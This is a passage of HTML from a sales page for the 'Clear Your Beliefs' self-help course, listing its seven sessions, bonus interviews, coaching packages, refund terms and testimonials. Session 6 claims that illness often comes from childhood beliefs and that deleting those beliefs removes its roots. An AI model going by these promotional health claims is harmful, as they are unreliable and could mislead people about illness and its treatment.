sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. 